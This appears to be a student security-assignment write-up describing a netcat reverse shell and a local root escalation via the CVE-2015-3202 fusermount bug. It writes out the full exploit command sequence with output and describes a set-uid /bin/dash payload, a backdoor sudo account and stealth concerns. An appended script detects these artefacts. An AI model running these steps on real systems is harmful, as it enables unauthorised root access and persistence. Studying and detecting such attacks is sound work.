path: root/CamilStaps-s4498062-Assignment-5/ex2
a
    There is not much to explain here: we open a listening netcat in the first terminal, and the command in the second terminal opens a connection to it from the server we should attack and executes /bin/bash.

    We then have a shell for www-data in the first terminal.

c
    I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then the next time root logs in (in the case of /etc/bash.bashrc), or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can then come back and find /bin/dash with u+s rights, so you can get root rights in that shell.

    I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. with find / -perm -u=s -type f 2>/dev/null).

    Concretely, the commands used were:

    $ printf "chmod 4755 /bin/dash" > /tmp/exploit
    $ chmod 755 /tmp/exploit
    $ mkdir -p '/tmp/exploit||/tmp/exploit'
    $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
    fusermount: failed to open /etc/fuse.conf: Permission denied
    sending file descriptor: Socket operation on non-socket
    $ cat /etc/default/locale
    /dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0

    When locale is sourced, that line is interpreted as a shell command: running /dev/fuse with the argument /tmp/exploit fails, so the || makes the shell execute /tmp/exploit instead.

    I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't log in. I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as an unprivileged user, you see:

    bash: /dev/fuse: Permission denied
    chmod: changing permissions of `/bin/dash': Operation not permitted
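As an added defender-side example (not part of the write-up above), the following POSIX shell script checks for the traces this technique leaves: a non KEY=VALUE line in /etc/default/locale, an mtab-shaped "/dev/fuse ... fuse ..." line in a shell start-up file, and unexpected set-uid files. File paths and sample contents in the demo are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. Three checks for the
# artefacts the CVE-2015-3202 fusermount trick leaves on a host.

# 1. /etc/default/locale should hold only blank lines, comments and
#    KEY=VALUE (optionally "export KEY=VALUE"). An mtab line written by
#    fusermount fails that rule. Offending lines go to stderr, count to stdout.
scan_env_file() {
    awk '
        /^[ \t]*(#|$)/ { next }                                # blank / comment
        /^[ \t]*(export[ \t]+)?[A-Za-z_][A-Za-z0-9_]*=/ { next } # KEY=VALUE
        { printf "%s:%d: %s\n", FILENAME, FNR, $0 > "/dev/stderr"; n++ }
        END { print n + 0 }
    ' "$1"
}

# 2. /etc/bash.bashrc legitimately contains shell code, so there we only look
#    for an fstab/mtab-shaped line: source /dev/fuse and fs type "fuse" in
#    field 3. Prints the number of such lines.
scan_for_mtab_line() {
    awk '$1 == "/dev/fuse" && $3 == "fuse" { n++ } END { print n + 0 }' "$1"
}

# 3. The payload's goal is a set-uid shell; list set-uid regular files under
#    a directory (the write-up's own find / -perm -u=s check, scoped to $1).
list_suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Demo against constructed files in a scratch directory (never touches /etc).
demo() {
    d=$(mktemp -d)
    printf 'LANG=en_US.UTF-8\n/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0\n' > "$d/locale"
    printf '# clean file\nLANG=C\nexport LC_ALL=C\n' > "$d/locale.clean"
    echo "suspect lines in tampered locale: $(scan_env_file "$d/locale" 2>/dev/null)"
    echo "suspect lines in clean locale:    $(scan_env_file "$d/locale.clean")"
    echo "mtab-shaped lines in tampered:    $(scan_for_mtab_line "$d/locale")"
    touch "$d/fake_suid" && chmod 4755 "$d/fake_suid"
    echo "set-uid files under scratch dir:"; list_suid_files "$d"
    rm -rf "$d"
}

demo
```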